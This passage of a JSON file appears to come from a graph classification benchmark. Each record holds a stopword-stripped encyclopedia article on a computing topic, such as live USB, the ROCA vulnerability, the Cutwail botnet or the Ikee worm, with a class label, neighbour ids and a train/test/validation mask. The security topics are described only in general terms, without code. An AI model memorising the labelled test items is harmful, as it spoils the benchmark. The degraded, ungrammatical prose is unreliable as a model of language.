    "text": "FreeBSD_Foundation:freebsd foundation freebsd foundation united states-based 501 c 3 registered non-profit organization dedicated supporting freebsd project development community funding comes individual corporate donations used sponsor developers specific activities purchase hardware network infrastructure provide travel grants developer summits freebsd foundation able provide legal representation sign contracts agreements behalf freebsd project also holds freebsd trademark related domain names freebsd foundation received initial 501 c 3 charity status december 7 2000 foundation formally announced world june 27 2001 current board directors follows",
    "neighbors": [
      3969,
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      546,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      2864,
      3248,
      9009,
      11698,
      6069,
      1718,
      11573,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      9927,
      8266,
      8395,
      1101,
      5710,
      8909,
      6864,
      7249,
      850,
      8147,
      10455,
      6361,
      8410,
      6491,
      9306,
      10971,
      607,
      3551,
      7521,
      1891,
      10851,
      998,
      9320,
      4073,
      8816,
      2545,
      3058,
      7027,
      9201,
      2421,
      9844,
      11506,
      2424,
      1273,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 4637,
    "label": 2,
    "text": "Live_USB:live usb live usb usb flash drive external hard disk drive containing full operating system booted evolutionary next step live cds added benefit writable storage live usb allowing customizations booted operating system live usbs used embedded systems system administration data recovery test driving persistently save settings install software packages usb device many operating systems including windows xp embedded large portion linux bsd distributions run usb flash drive windows 8 enterprise feature titled windows go similar purpose repair computer booting issues technicians often use lightweight operating systems bootable media command line interface development first live cds graphical user interface made feasible non-technicians repair malfunctioning computers live cds linux based addition repairing computers would occasionally used right operating systems personal computers introduced usb booting early 2000s macintosh computers introducing functionality 1999 beginning power mac g4 agp graphics slot-loading imac g3 models intel-based macs carried functionality booting macos usb specialized usb-based booting proposed ibm 2004 reincarnating pcs portable soulpads boot gnu/linux firewire device live usbs share many benefits limitations live cds also incorporate various applications exist create live usbs examples include rufus fedora live usb creator unetbootin wintousb win32diskimager yumi works variety distributions linux distributions live cds ready-made scripts perform steps automatically addition knoppix ubuntu extra applications installed persistent file system used store changes base install ranges little 16 mib tiny core linux large dvd-sized install 4 gigabytes set live usb system commodity pc hardware following steps must taken knoppix live cds utility boot allows users declare intent write operating system file structures either temporarily ram disk permanently disk flash media preserve added configurations security updates easier recreating usb system may moot since many live usb tools simple use alternative live solution traditional operating system installation elimination swap partitions installation advantage efficient software live installation would still contain software removed persistent file due operating systems installer still included media however full installation without disadvantages due additional write cycles occur full installation life flash drive may slightly reduced mitigate live systems designed store changes ram user powers system writes changes another factor speed storage device destitute performance comparable legacy computers even machines modern parts flash drive transfers speeds one way solve use usb hard drive generally give better performance flash drives regardless connector although many live usbs rely booting open-source operating system linux possible create live usbs windows using diskpart wintousb syslinux common program make bootable usb storage device",
    "neighbors": [
      2560,
      5120,
      5123,
      3079,
      1032,
      6155,
      2064,
      6675,
      7187,
      10776,
      25,
      3097,
      10780,
      3618,
      4643,
      6180,
      9762,
      5158,
      3629,
      4145,
      7217,
      10803,
      8248,
      9784,
      10809,
      3643,
      576,
      2625,
      10306,
      10817,
      6221,
      9807,
      3160,
      10333,
      3167,
      97,
      11363,
      3685,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      7812,
      8837,
      8326,
      10883,
      10891,
      6797,
      10382,
      8847,
      10896,
      2195,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      1694,
      9887,
      7840,
      9377,
      8879,
      3248,
      178,
      9907,
      6837,
      9910,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      4309,
      7382,
      8410,
      9436,
      1247,
      1761,
      11489,
      6371,
      1253,
      4841,
      7914,
      7403,
      242,
      3314,
      5363,
      6393,
      9466,
      2811,
      3323,
      9468,
      1278,
      7938,
      10499,
      5895,
      4360,
      7431,
      1804,
      6416,
      273,
      8977,
      787,
      3859,
      789,
      278,
      1813,
      5397,
      8978,
      11539,
      10016,
      292,
      6436,
      3366,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      4929,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      2930,
      9074,
      5492,
      2933,
      11635,
      376,
      6012,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      4493,
      8076,
      7057,
      11155,
      11667,
      2967,
      11675,
      8092,
      2462,
      5022,
      421,
      934,
      935,
      1445,
      4521,
      6055,
      4011,
      9643,
      4525,
      9646,
      10153,
      11184,
      7601,
      10676,
      6075,
      8124,
      9660,
      6078,
      9151,
      7106,
      11204,
      11205,
      4040,
      8136,
      5067,
      9166,
      8147,
      5078,
      985,
      9693,
      10730,
      1515,
      10731,
      8687,
      6128,
      5105,
      5618,
      5619,
      5115,
      3068
    ],
    "mask": "Test"
  },
  {
    "node_id": 4638,
    "label": 5,
    "text": "IPFC:ipfc ipfc stands internet protocol fibre channel governs set standards created january 2006 address resolution arp transmitting ipv4 ipv6 network packets fibre channel fc network ipfc makes part fc-4 protocol-mapping layer fibre channel system ipfc ip datagram packet wrapped fc frame header transmitted sequence one frames receiver end received frames strips fc headers reassembles ip packet ip datagrams 65,280 bytes size may accommodated arp packet transmission works fashion ip datagram exchange unidirectional although ip tcp allow bidirectional communication within protocols ipfc application protocol typically implemented device driver operating system ip fc plays less important role storage area networking scsi fibre channel ip ethernet ipfc used example provide clock synchronization via network time protocol ntp",
    "neighbors": [
      5472,
      10344,
      1743,
      7983,
      216,
      5437,
      5469,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 4639,
    "label": 4,
    "text": "RCCA_security:rcca security replayable cca security rcca security security notion cryptography relaxes older notion security chosen-ciphertext attack cca precisely adaptive security notion cca2 cca-secure systems rcca secure converse true claim lot use cases cca strong rcca suffices nowadays certain amount cryptographic scheme proved rcca-secure instead cca secure introduced 2003 research publication ran canetti hugo krawczyk jesper b. nielsen",
    "neighbors": [
      177,
      1797
    ],
    "mask": "Test"
  },
  {
    "node_id": 4640,
    "label": 8,
    "text": "Web_log_analysis_software:web log analysis software web log analysis software also called web log analyzer kind web analytics software parses server log file web server based values contained log file derives indicators web server visited reports usually generated immediately data extracted log files alternatively stored database allowing various reports generated demand features supported log analysis packages may include hit filters use pattern matching examine selected log data",
    "neighbors": [
      8448,
      225,
      705,
      4033,
      6273,
      2312,
      3401,
      7983,
      6576,
      8470,
      1943,
      9014,
      5724,
      10814
    ],
    "mask": "Test"
  },
  {
    "node_id": 4641,
    "label": 3,
    "text": "IBM_Mwave:ibm mwave mwave technology developed ibm allowing combination telephony sound card features single adapter card technology centers around mwave digital signal processor dsp technology used time provide combination modem sound card ibm aptiva line thinkpad laptops addition uses specialized mwave cards handled voice recognition isdn networking connectivity similar adapter cards third-party vendors using mwave technology also sold however plagued consumer complaints buggy mwave software hardware ibm eventually turned audio telephony solutions consumer products malcolm ware former developer mwave dates technology back development ibm research lab zurich switzerland 1979 first prototype tested ibm pc 1981 utilized adapter cards mwave given official name used ibm windsurfer isa/mca card ibm manufactured mwave hardware microsoft windows os/2 another revision technology used ibm newly renamed aptiva line one revisions mwave card mwave dolphin card isa legacy card support plug play natively supported windows software featured 28.8k/second fax/modem sound blaster-compatible audio solution one card publicized features software upgradeability version mwave software upgraded modem function 33.6k addition card key support aptiva rapid resume features including wake-up ring various consumer complaints users reporting problems involving either sound modem features separately using time consumers offered check purchase hardware replace mwave card others offered replacement modem sound card one point class action lawsuit filed finally settled 2001 mwave dolphin drivers version 20d stingray version mwave adapter addressed shortcomings dolphin stingray added plug play support ibm eventually stopped using mwave adapter card aptiva computers resorted conventional sound card modem options mwave form another produced mca isa pcmcia busses select thinkpad 600 770 models pci version integrated mwave chip integrated select thinkpad 755 760 765 models isa-based certain sun sparcstation workstations incorporated mwave dsp chip sound card functionality although mwave adapter cards discontinued linux driver pci-based mwave thinkpad 600 770 models developed released ibm",
    "neighbors": [
      3304,
      6797,
      8561,
      823,
      5368,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4642,
    "label": 3,
    "text": "Leading_Edge_Model_D:leading edge model leading edge model ibm clone computer first released leading edge hardware july 1985 initially priced 1,495 configured dual 5.25 floppy drives 256 kb ram monochrome monitor manufactured south korean conglomerate daewoo distributed canton massachusetts-based leading edge engineer stephen kahng spent four months designing model cost 200,000 kahng later became ceo macintosh clone maker power computing august 1986 leading edge cut price base model 200 1,295 increased base memory machine 512 kb model immediate success selling 100,000 units first year production continued sell well several years dispute dealers forced leading edge bankruptcy 1989 model initially featured intel 8088 microprocessor 4.77 mhz although later models switch back run 4.77 mhz normal 7.16 mhz high earlier models turbo switch ran 4.77 mhz later ones seemingly rare 7.16 mhz four models known dc-2010 dc-2011 dc-2010e dc-2011e e seems correlate capability running 7.16 mhz unlike ibm pc ibm pc/xt model integrated video disk controller battery backed clock serial parallel ports directly onto motherboard rather putting plug-in cards allowed model half size ibm models four full-length isa expansion slots available motherboard came eight different revisions revision 1 5 7 8 cc1 cc2 wc1 wc2 list motherboard part numbers revision numbers found revisions 1 7 usually found models dc-2010 dc-2011 revisions 8 wc2 either 2010e 2011e wc1 presumably also wc2 7.16 mhz due tight integration model motherboard nonstandard form factor replacing motherboard off-the-shelf upgrade possible model came preinstalled 256 512 640 kb ram lower-capacity machines user upgradeable 640 kb motherboard revisions 7 8 wc1 wc2 came 768 kb ram installed 640 kb available user models featured monochrome/cga selection switch single port used modes models monochrome cga port also switch change modes ports model computers supported special extended graphics mode 640x200 buyer choice floppy disk model fixed disk hard disk model floppy disk model one two 360 kb drives user could run ms-dos programs primary drive work files secondary drive equipped fixed disk model one 360 kib floppy drive either 10 mb 20 mb 30 mb hard disk model 20 mb fixed disk initially released february 1986 cost 1,895 leading edge dealers difficulty keeping 20mb model stock time tandy 1200 equipped 10mb drive sold 1999 buyer also choice amber green monochrome crt monitor unit came ms-dos 2.11 later special edition gw-basic support extended graphics mode also came diagnostics disk disk contained diagnostics program park.com utility used park hard drive heads computer moved models also came word processing program developed leading edge titled leading edge word processor commonly referred acronym 'lewp computer supports microsoft windows operating system version 3.0 last version windows support real mode dataquest estimated model 1 american home-computer market 1986 first year availability 1,495 list price lowest seven compatibles comparable configurations september 1985 infoworld chart half price 2,820 ibm pc along tandy 1000 epson equity series model one first ibm pc compatible computers become popular home use due low price good reviews previously ms-dos ibm compatibles almost exclusively used businesses home computer market dominated commodore apple atari years afterward many home-oriented software packages pc specifically cited model along tandy epson models compatible hardware leading edge phoenix technologies first customer ibm-compatible bios model one first pcs market use phoenix bios although advertised 100 ibm compatible numerous letters published january 13 1986 issue infoworld identified compatibility issues several popular software packages aftermarket hard drives syndicated newspaper columnists t.r reid michael schrage writing april 1986 predicted popularity model would lead hardware software vendors specifically testing compatibility spite early reports model continued sell well early 1987 daewoo producing 13,000 units per month failing keep demand result buyers waited 2–8 weeks taking delivery model also distinction first korean-made pc sold united states time introduction undercut price similar ibm pc compatibles 500 pc magazine october 1985 called model clear winner among six inexpensive pc compatibles tested review noted computer many included hardware features concluded may represent next generation personal computing compact full ibm hardware compatibility allows full featured quite well made alluringly priced model received 4 5 stars infoworld praised computer value high level compatibility december 1985 concluded recommend highly especially budget-conscious beginner positive october 1986 review popular mechanics cited low price quality keyboard received good reviews computer magazines consumer reports magazine",
    "neighbors": [
      4674,
      6660,
      1515,
      6797,
      9166,
      2159,
      6129,
      9363,
      7190,
      5368,
      4411
    ],
    "mask": "Test"
  },
  {
    "node_id": 4643,
    "label": 2,
    "text": "BBN_Time-Sharing_System:bbn time-sharing system bbn time-sharing system early time-sharing system created bolt beranek newman bbn pdp-1 computer began operation september 1962 digital equipment corporation prototype pdp-1 ready november 1959 machine featured november/december issue datamation magazine bbner ed fredkin saw prototype system eastern joint computer conference boston december 1959 extremely interested given bbn interest dec founder president ken olsen visited explained dec completed construction prototype pdp-1 needed test site month bbn agreed test site regular hourly rates early 1960 obtained prototype pdp-1 first production pdp-1 arrived november 1960 formally accepted april 1961 pdp-1 installed bbn 1960 j.c.r licklider took mit john mccarthy marvin minsky consultants mccarthy advocating concept time-sharing computers found slow progress mit bbn licklider fredkin keenly interested particular fredkin insisted timesharing could done small computer namely pdp-1 fredkin recounts mccarthy recalled 1989 accordingly bbn team largely led sheldon boilen built custom hardware add-ons company second pdp-1 provide external interrupt system magnetic drum swapping storage end bbn acquired first univac fastrand rotating drum 45-mbyte storage capacity access time 0.1 second fall 1962 bbn conducted public demonstration bbn time-sharing system one operator washington d.c. two cambridge.. described mccarthy et al. computer hardware follows pdp-1 single address binary computer 18 bit word five microsecond memory cycle instructions require ten microseconds execute basic memory size 4096 words 65,536 words may addressed indirectly machine used 8192 words 4096 reserved time-sharing system user sees 4096 word memory ... attached computer high speed magnetic drum memory divided 22 fields 4096 words basic operation drum system memory-swap accomplished 33 milliseconds operation 4096 words transferred core memory drum field simultaneously core memory loaded different drum field ... 4096 word drum field allocated saving core image user program running user program run status run 140 milliseconds another user also run status state core memory stored first user core image drum simultaneously second user core image loaded core second user program started appropriate place",
    "neighbors": [
      6529,
      2179,
      10499,
      10883,
      7048,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      4799,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4644,
    "label": 4,
    "text": "ROCA_vulnerability:roca vulnerability roca vulnerability cryptographic weakness allows private key key pair recovered public key keys generated devices vulnerability roca acronym return coppersmith attack vulnerability given identifier cve-2017-15361 vulnerability arises problem approach rsa key generation used software library rsalib provided infineon technologies incorporated many smart cards trusted platform module tpm implementations vulnerability appears recent yubikey 4 tokens often used generate pgp keys keys lengths 512 1024 2048 bits generated using infineon library vulnerable practical roca attack research team discovered attack masaryk university led matúš nemec marek sýs estimate affects around one-quarter current tpm devices globally millions smart cards believed affected team informed infineon rsalib problem february 2017 withheld public notice mid-october citing responsible disclosure time announced attack provided tool test public keys vulnerability published details attack november generating rsa key involves selecting two large randomly-generated prime numbers process time-consuming particularly small devices smart cards addition primes numbers certain properties best security vulnerable rsalib selection process quickly creates primes desired type testing primality numbers form formula_2 product first n successive primes 2 3 5 7 11 13 ... n constant depends desired key size security based secret constants formula_3 formula_4 roca attack exploits particular format primes using variation coppersmith method addition public keys generated way distinctive fingerprint quickly recognized attempting compute discrete logarithm public key mod formula_2 base 65537 computing discrete logarithms large group usually extremely difficult case done efficiently using pohlig–hellman algorithm formula_2 smooth number test site available internet roca authors consider public keys length 512 1024 2048-bits generated rsalib vulnerable details key generation differ different key lengths shorter keys necessarily vulnerable longer keys example 1952-bit rsalib key stronger 2048-bit key 4096-bit key weaker 3072-bit key best mitigation according authors generate rsa keys using stronger method openssl possible roca authors suggest using key lengths less susceptible roca 3936-bit 3072-bit 1952-bits 2048-bit key size maximum",
    "neighbors": [
      1024,
      2050,
      5636,
      9745,
      4117,
      8726,
      535,
      9761,
      3619,
      4133,
      1608,
      3657,
      8779,
      8283,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      2709,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      7354,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      2804,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      298,
      2857,
      8489,
      11052,
      9518,
      1337,
      10566,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      8674,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 4645,
    "label": 2,
    "text": "Data_Control_Block:data control block ibm mainframe operating systems os/360 mvs z/os data control block dcb description dataset program dcb coded assembler programs using dcb macro instruction expands large number define constant instructions high level language programmers use library routines containing dcbs dcb one many control blocks used operating systems control block data area predefined structure similar c codice_1 typically related system functions dcb may compared file structure c much complex offering many options various access methods control block acted application programming interface logical iocs application program usually defined within resided within application program addresses i/o subroutines would resolved linkedit phase compilation else dynamically inserted open time equivalent control block ibm dos/360 dos/vse z/vse operating systems dtf define file many constants variables contained within dcb may left blank i.e. default zero open process results merge constants variables specified dd jcl statement dataset label existing magnetic tape direct-access datasets dcb replacing zero values actual non-zero values control block called jfcb job file control block initially holds information extracted dd statement dataset results merge stored jfcb may also written dscb close process thereby making dataset definition permanent example blksize= variable may usually specified dcb zero dd statement blksize specified non-zero value results program-specified lrecl logical record length jcl-specified blksize physical block size merge two becoming permanent definition dataset",
    "neighbors": [
      8290,
      1219,
      6664,
      7053,
      10958,
      7983,
      8911,
      2804,
      2168,
      9977,
      11131,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 4646,
    "label": 2,
    "text": "Crash-only_software:crash-only software crash-only software refers computer programs handle failures simply restarting without attempting sophisticated recovery correctly written components crash-only software microreboot known-good state without help user since failure-handling normal startup use methods increase chance bugs failure-handling code noticed except leftover artifacts data corruption severe failure n't occur normal startup crash-only software also benefits end-users often applications save data settings running end use example word processors usually save settings closed crash-only application designed save changed user settings soon changed persistent state matches running machine matter application terminates clean close sudden failure laptop battery state persist erlang computer language originally built ericsson fault-tolerant telephone switches programs structured modules replaced hot swapped without restart entire program module crashes needs updated restarted replaced without affecting part program within open telecom platform often used together erlang exist frameworks simplify automate task",
    "neighbors": [
      7187,
      8127
    ],
    "mask": "Test"
  },
  {
    "node_id": 4647,
    "label": 2,
    "text": "Jet_Data_Access_Objects:jet data access objects jet data access objects general programming interface database access microsoft windows systems primarily jet ace databases dao originally called vt objects dao 1.0 came november 1992 part access 1.0 version 3.5 able bypass jet engine altogether directly access odbc data sources including microsoft sql server enterprise database systems dao 3.6 shipped jet 4.0 access 2007 later uses ace acedao new features supported ace added acedao longer supports odbcdirect dao works creating workspace object database operations performed workspace object exists session object exists within larger database engine object two types database engines jet database engine object odbcdirect database engine jet database engine access 2007 later ace object consists several objects first version dao used snapshot/dynaset/table objects etc dao 2.0 recordset etc objects introduced dao 3.0/3.5 supported old objects using special compatibility tlb removed completely dao 3.6 odbcdirect database engine consists workspace object errors object main differences database engine jet database engine odbc connection objects consist querydef objects recordset objects",
    "neighbors": [
      736,
      7523,
      8804,
      4261,
      2183,
      5356,
      6797,
      2901,
      11030,
      5401,
      8607
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4648,
    "label": 4,
    "text": "Cutwail_botnet:cutwail botnet cutwail botnet founded around 2007 botnet mostly involved sending spam e-mails bot typically installed infected machines trojan component called pushdo affects computers running microsoft windows june 2009 estimated cutwail botnet largest botnet terms amount infected hosts security provider messagelabs estimated total size botnet around 1.5 2 million individual computers capable sending 74 billion spam messages day 51 million every minute equal 46.5 worldwide spam volume february 2010 botnet activities slightly altered started ddos attack 300 major sites including cia fbi twitter paypal reasons attack n't fully understood experts described accident mainly due lack damage disruption along infrequency attacks august 2010 researchers university california santa barbara ruhr university bochum attempted take botnet managed take offline 20 30 command control servers botnet using cutwail fairly simple botnet bots connect directly command control server receive instructions emails send done task bots report back spammer exact statistics number emails delivered many errors reported cutwail botnet known 0bulk psyche evolution underground market spammers rent instance botnet fee use send spam campaigns services offered botnet advertised russian underground forum spamdot.biz taken 2010 june 2010 least 8 different spam groups using botnet deliver junk mail",
    "neighbors": [
      3072,
      10756,
      3724,
      6797,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      939,
      46,
      10297,
      3643,
      1979,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Train"
  },
  {
    "node_id": 4649,
    "label": 4,
    "text": "Ikee:ikee ikee worm spread secure shell connections jailbroken iphones stole apple ids passwords discovered 2009 changed wallpapers photo rick astley iphone owners australia reported smart phones infected worm changed iphone wallpaper rick astley 1980s pop singer affected smartphones owner change default password installation ssh ikee worm infected would find iphones mobile network vulnerable infect well worm would n't affect users n't jailbroken installed ssh iphone worm nothing changing infected user lock screen wallpaper source code ikee worm says written ikex",
    "neighbors": [
      11266,
      10756,
      901,
      7739,
      10341,
      2538,
      2259,
      2041,
      7515,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4650,
    "label": 5,
    "text": "MAC_service_data_unit:mac service data unit mac service data unit media access control service data unit msdu service data unit received logical link control llc sub-layer lies media access control mac sub-layer protocol stack llc mac sub-layers collectively referred data link layer dll",
    "neighbors": [
      7865,
      5118,
      3847
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4651,
    "label": 1,
    "text": "Ideas_bank:ideas bank ideas bank widely available shared resource usually website people post exchange discuss polish new ideas ideas banks used develop new inventions technologies many corporations installed internal ideas banks gather input employees improve ideation process ideas banks employ voting system estimate idea value cases ideas banks humor-oriented serious counterparts many ideas banks provided free charge set around certain companies general work new inventions although ideas provided community people problems arise people take ideas site begin developing possible way prove idea ideas bank original taken something else front end innovation quite distinct remainder innovation process best ideas discovered managed stage gate oriented project management system work flow defined front end innovation commonly referred fuzzy functions best collaborative system nurtures chaos disruption serendipitous discovery ideas ideas submitted via electronic suggestion box limited incremental innovation things way always better nothing wrong incremental innovation fact ideas leading projects resulting incremental innovation typically yield rapid revenue gains cost savings organizations using collaborative idea management systems get breakthrough radical innovation ideas thought box thinking fuzzy front end innovation benefits collaborative tool serving backbone nurture organization culture innovation everyone log system post objects interest users search information comment information discover experts organization needed result everyone well informed sense collaborative tool serves knowledge management system facebook-like except everyone talking work course collaborative tool also accepts submission ideas idea management software solution manages ideas allowing others comment shaping idea clustering similar ideas utilizing idea management software similarity search capabilities accepting sort voting scheme order score idea worth better idea management software systems use algorithm measure wisdom crowd gauging social media type activity instance means best ideas automatically promoted get combination votes comments votes comments views follows alerts bookmarks similar ideas posted ... combined mathematical formula determine idea best measured group collaborators working ideas unsolicited ideas typically lead incremental innovation get radical breakthrough innovation idea management system needs indulge strategic guidance issuing challenges campaigns seeding essence bottom grown organizational engagement collaborative idea management system managed little bit top strategic guidance company saying 're glad 're talking together us favor talk ... ask ideas address big issues company instance make company 'green next new product us collaborating companies assemble smart people company exchange ideas enhance ideas best ideas automatically promoted need automated promotion mechanism software problem n't wo n't get enough ideas problem 'll get many n't want someone manually filter",
    "neighbors": [
      7114,
      6202
    ],
    "mask": "Train"
  },
  {
    "node_id": 4652,
    "label": 0,
    "text": "Audio_mining:audio mining audio mining technique content audio signal automatically analysed searched commonly used field automatic speech recognition analysis tries identify speech within audio audio typically processed speech recognition system order identify word phoneme units likely occur spoken content information may either used immediately pre-defined searches keywords phrases real-time word spotting system output speech recogniser may stored index file one audio mining index files loaded later date order run searches keywords phrases results search normally terms hits regions within files good matches chosen keywords user may able listen audio corresponding hits order verify correct match found audio mining systems used field speech recognition often divided two groups use large vocabulary continuous speech recognisers lvcsr use phonetic recognition musical audio mining also known music information retrieval relates identification perceptually important characteristics piece music melodic harmonic rhythmic structure searches carried find pieces music similar terms melodic harmonic and/or rhythmic characteristics",
    "neighbors": [
      1890,
      10557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4653,
    "label": 2,
    "text": "Wii_Freeloader:wii freeloader wii freeloader bootdisc developed datel circumvent regional lockout wii video game console allows playing games regions allow use dvd±r commonly used backups copies homebrew used combination modchip allow compatibility games use update blocker user enters bootdisc wii system launches application wii menu replaces disc region-locked game disc disc allows user play foreign gamecube games issues reported different signals games simply working foreign system even use wii freeloader wii games one version game disc siliconera reported north american version video game played japanese wii using wii freeloader switch play japanese version game system",
    "neighbors": [
      1067,
      6878
    ],
    "mask": "Test"
  },
  {
    "node_id": 4654,
    "label": 4,
    "text": "Default_password:default password device needs username and/or password log default password usually provided allows device accessed initial setup resetting factory defaults manufacturers equipment typically use simple password admin password equipment ship expectation users change password configuration default username password usually found instruction manual common devices device default passwords one major contributing factors large-scale compromises home routers leaving password devices available public huge security risk devices wireless routers come unique default router username passwords printed sticker secure option common default password vendors however derive password device mac address using known algorithm case password also easily reproduced attackers access internet connected devices network user must know default ip address manufacturers typically use codice_1 also codice_2 default router ip address however variations similarly login details leaving unchanged lead security issues",
    "neighbors": [
      5002,
      107,
      4373,
      7411
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4655,
    "label": 7,
    "text": "Nsite_Software:nsite software nsite a.k.a nsite.com nsite software platform service company based bay area specializing sales force enhancements although several pre-built applications offered platform promising part nsite ability customer use product develop application using simple internet-based interface since 2006 part sap business objects company claimed 27,000 customers worldwide acquired sap business objects november 2006 flagship product subscription-based nsite platform components provide quote proposal order management custom development platform ajax front-end ms-sql back-end paul tabet co-founded nsite 1998 together others chief executive officer 2002 2002 alf goebel announced ceo two years later bob jandro announced new ceo nsite grew 27,000 customers height success started downward spiral shortly sap business objects acquisition finally met end 2010 announced retirement",
    "neighbors": [
      3405
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4656,
    "label": 9,
    "text": "GrGen:grgen grgen.net software development tool offers programming languages domain specific languages optimized processing graph structured data core languages consists modular graph rewrite rules built declarative graph pattern matching rewriting supplemented many constructs used imperative object-oriented programming completed language devices known database query languages graph rewrite generator compiles languages efficient cli assemblies via c -code intermediate step integrated via api code written .net-language grgen executed windows linux mono needed open source available lgpl v3 rapid prototyping debugging interactive shell vcg- graph viewer included package languages visual stepwise debugging grgen allows one develop natural level abstraction graph-based representations employed engineering model transformation computational linguistics compiler construction intermediate representation grgen increases productivity kinds tasks far beyond achieved programming traditional programming language due many implemented performance optimizations still allows one achieve high-performance solutions authors claim system offers highest combined speed development execution available algorithmic processing graph-based representations based performance regarding diverse tasks posed different editions transformation tool contest /grabats example containing graph model rule specifications grgen.net-solution antworld-case posed grabats 08 graph model rewrite rules",
    "neighbors": [
      1952,
      9345,
      1890,
      8262,
      9926,
      5612,
      6797,
      7983,
      10703,
      823,
      987,
      7325
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4657,
    "label": 2,
    "text": "Apple_Software_Restore:apple software restore apple software restore asr command line utility mac os x used apply dmg disk image selected partition mount point file system often used cloning large numbers macintosh computers apple software restore read image locally server via http multicast asr // uri asr two methods use restore image volume either copy items file-by-file mode directly block-copy image latter method need go os filesystem much faster typically limited speed drives network connections involved order use faster method .dmg file involved must first checksummed cases files re-ordered inside image also done tool graphical disk utility uses asr processes background perform restores",
    "neighbors": [
      11137,
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      9762,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      9418,
      9035,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "None"
  },
  {
    "node_id": 4658,
    "label": 2,
    "text": "Internet_Server_Application_Programming_Interface:internet server application programming interface internet server application programming interface isapi n-tier api internet information services iis microsoft collection windows-based web server services prominent application iis isapi microsoft web server isapi also implemented apache mod_isapi module server-side web applications written microsoft iis used apache third-party web servers like zeus web server offer isapi interfaces microsoft web server application software called internet information services made number sub-applications configurable asp.net one slice iis allowing programmer write web applications choice programming language vb.net c f supported microsoft .net clr isapi much lower-level programming system giving much better performance expense simplicity isapi consists two components extensions filters two types applications developed using isapi filters extensions must compiled dll files registered iis run web server isapi applications written using language allows export standard c functions instance c c++ delphi couple libraries available help ease development isapi applications delphi pascal intraweb components web-application development mfc includes classes developing isapi applications additionally atl server technology includes c++ library dedicated developing isapi applications isapi extensions true applications run iis access functionality provided iis isapi extensions implemented dlls loaded process controlled iis clients access isapi extensions way access static html page certain file extensions complete folder site mapped handled isapi extension isapi filters used modify enhance functionality provided iis always run iis server filter every request find one need process filters programmed examine modify incoming outgoing streams data internally programmed externally configured priorities determine order filters called filters implemented dlls registered iis server site level global level i.e. apply sites iis server filters initialised worker process started listens requests site installed common tasks performed isapi filters include list common isapi applications implemented isapi extensions isapi applications developed using development tool generate windows dll wizards generating isapi framework applications available microsoft development tools since visual c++ 4.0",
    "neighbors": [
      8582,
      1802,
      10506,
      6797,
      9229,
      11154,
      1556,
      8350,
      10654,
      10020,
      10026,
      7212,
      1837,
      10284,
      2485,
      5048,
      7608,
      1468,
      4797,
      8644,
      1098,
      11466,
      3920,
      4439,
      5593,
      5849,
      6366,
      225,
      865,
      7784,
      9834,
      9580,
      4974,
      8689,
      9841,
      5754,
      124,
      9726
    ],
    "mask": "Test"
  },
  {
    "node_id": 4659,
    "label": 4,
